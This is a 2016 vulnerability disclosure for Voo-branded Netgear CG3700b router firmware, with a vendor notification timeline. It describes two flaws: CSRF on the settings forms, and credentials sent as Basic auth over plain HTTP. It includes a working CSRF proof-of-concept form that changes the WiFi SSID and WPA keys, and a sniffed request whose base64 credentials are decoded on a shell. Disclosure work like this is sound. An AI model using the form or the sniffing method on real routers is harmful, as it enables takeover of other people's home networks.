Voo Branded Netgear CG3700b Firmware CSRF / Authentication
Posted on 28 April 2016
CVEs pending, screenshots and further examples available soon on my site. Cross-Site Request Forgery (CSRF) on all form POSTs --------------------------------------------------------------------------------- The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03) allows a (context-dependent) attacker to perform a Cross-Site Request Forgery (CSRF) attack on all configuration setting (/goform/<settingspage>) page POST requests. By tricking a user into following a specially crafted link, an attacker can modify all settings including WEP/WPA/WPA2 keys, restore the router to factory settings, or even upload an entire malicious configuration file. Example: <form method="POST" name="form0" action="http://192.168.0.1/goform/index" <input type="hidden" name="group_parametrage_wifi" value="active"> <input type="hidden" name="reseau_wifi_name" value="NEWSSID"> <input type="hidden" name="nom_select" value="AUTO-PSK"> <input type="hidden" name="canal" value=0> <input type="hidden" name="mot_de_passe" value="NEWWPAKEY"> <input type="hidden" name="NBandwidth" value=20> <input type="hidden" name="group_parametrage_wifi_an" value="active"> <input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G"> <input type="hidden" name="nom_select_an" value="AUTO-PSK"> <input type="hidden" name="canal_an" value=0> <input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G"> <input type="hidden" name="NBandwidth_an" value=20> <input type="hidden" name="group_fon" value="desactiver"> <input type="hidden" name="buttonApply" value=1> <input type="hidden" name="only_mode" value=0> <input type="hidden" name="selected_ch_an" value=1> </form> Insufficient Authentication (OWASP-A2) ----------------------------------------------------------- This same modem handles authentication via basic authentication over the default (HTTP, non-ssl) connection. This allows an attacker to easily decode the base64 encoded username and password, and authenticate to the router. This only requires an attacker be on the same network as the router, and sniff the clear-text traffic. Example: POST http://192.168.0.1/goform/parametre_config HTTP/1.1 Host: 192.168.0.1 Connection: keep-alive Content-Length: 24721 Cache-Control: max-age=0 Authorization: Basic dm9vOlBBU1NXT1JE root@kali:~# cat voo.txt dm9vOlBBU1NXT1JE root@kali:~# base64 --decode voo.txt voo:PASSWORD Disclosure Timeline ----------------------------- 22 Jan - discovered vulnerability, initially notified vendor 23 Jan - requested CVE 7 Mar - contacted vendor again, was notified that this will not be fixed at this time 20 April - attempted to contact Mitre again to receive CVE 21 April - sent to Full Disclosure 23 April - additional information (tentatively) posted to http://www.doyler.net 26 April - resending to Full Disclosure due to some errors